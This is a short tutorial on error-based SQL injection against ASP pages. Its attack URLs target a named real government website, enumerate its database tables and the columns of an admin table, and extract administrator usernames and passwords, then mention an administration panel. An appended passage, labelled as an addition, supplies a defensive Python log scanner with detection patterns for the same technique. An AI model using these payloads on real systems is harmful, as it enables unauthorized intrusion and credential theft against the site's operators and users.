TUTORIAL: BLIND SQL INJECTION IN ASP

  • Published on
    26-Dec-2014


We start by sending the query to the victim site:

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof','depurada$')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof','depurada$','dtproperties')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_ge_mof','depurada$','dtproperties','sysconstraints','syssegments','tbl_ctrl_users','tbl_estadoCivil','tbl_ge_admin','tbl_ge_certificacion','tbl_ge_ctrlcod','tbl_ge_eventos','tbl_ge_gradacad','tbl_ge_idioma','tbl_ge_instituidioma','tbl_ge_instituprofe','tbl_ge_merito','tbl_ge_niveles','tbl_ge_pais','tbl_ge_plazvac','tbl_ge_programa','tbl_ge_puesto','tbl_ge_tpUsuario','tbl_gedirgen','tbl_geprofesion','tbl_gr_direccion','tbl_ma_experlabo','tbl_ma_idioma','tbl_ma_personal','tbl_ma_plazvac','tbl_ma_profesion','tbl_ma_reconocimientos')))--

We work with the table tbl_ge_admin

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin'))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser','str_nomape')))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser','str_nomape','str_cargo')))--

Having extracted all the columns, once there are none left to retrieve the query no longer returns any error:

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tbl_ge_admin' and column_name not in ('str_cdUser','str_nomape','str_cargo','password','estado','fecinsc')))--

All columns: 'str_cdUser','str_nomape','str_cargo','password','estado','fecinsc'

Querying the table:

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 str_cdUser from tbl_ge_admin))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 password from tbl_ge_admin))--

www.mtc.gob.pe/legajo/curriculum2.asp?dociden=' and 1=convert(int,(select top 1 str_nomape from tbl_ge_admin))--
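As an added defensive example (not part of the original tutorial), the following Python scanner reads constructed IIS-style log lines and flags requests carrying the signature of this error-based technique: the quote breakout, CONVERT(INT,(SELECT ...)) on a subquery, catalog-view enumeration, and the trailing `--` comment. The log field order, client address and sample lines are assumptions built for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based extraction shown above. Each request is
# decoded first, so the match runs on the SQL the server would actually see.
SIGNATURES = {
    "quote_breakout": re.compile(r"'\s*(and|or)\b", re.I),
    "convert_int_subquery": re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}

def decode_query(qs: str) -> str:
    """Percent-decode until stable so double-encoded payloads (%2527) are caught too."""
    prev = None
    while prev != qs:
        prev, qs = qs, unquote_plus(qs)
    return qs

def inspect_log_line(line: str):
    """Assumed (constructed) field order: date time c-ip method uri-stem uri-query status.
    Returns (client_ip, uri_stem, matched_signature_names) or None if nothing matched."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 6:
        return None
    _, _, client_ip, _, uri_stem, query = parts[:6]
    decoded = decode_query(query)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    # Require two independent signatures to keep ordinary text with "and" or "--" out.
    return (client_ip, uri_stem, hits) if len(hits) >= 2 else None

def scan(lines):
    """Return every flagged request from an iterable of log lines."""
    return [r for r in (inspect_log_line(l) for l in lines) if r]

# Constructed sample log: one benign lookup, one text search, one injection attempt.
SAMPLE_LOG = [
    "2014-12-26 10:15:01 198.51.100.7 GET /legajo/curriculum2.asp dociden=12345678 200",
    "2014-12-26 10:15:02 198.51.100.8 GET /buscar.asp q=tom+and+jerry+--+parte+2 200",
    "2014-12-26 10:15:03 203.0.113.5 GET /legajo/curriculum2.asp "
    "dociden=%27+and+1%3Dconvert(int%2C(select+top+1+table_name+from+information_schema.tables))-- 500",
]

if __name__ == "__main__":
    for ip, uri, hits in scan(SAMPLE_LOG):
        print(f"{ip} {uri} matched {', '.join(hits)}")
```

The HTTP 500 in the flagged line is the conversion error the technique relies on; pairing the query signature with repeated 500s from one client is a stronger alert than either alone.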

Administration panel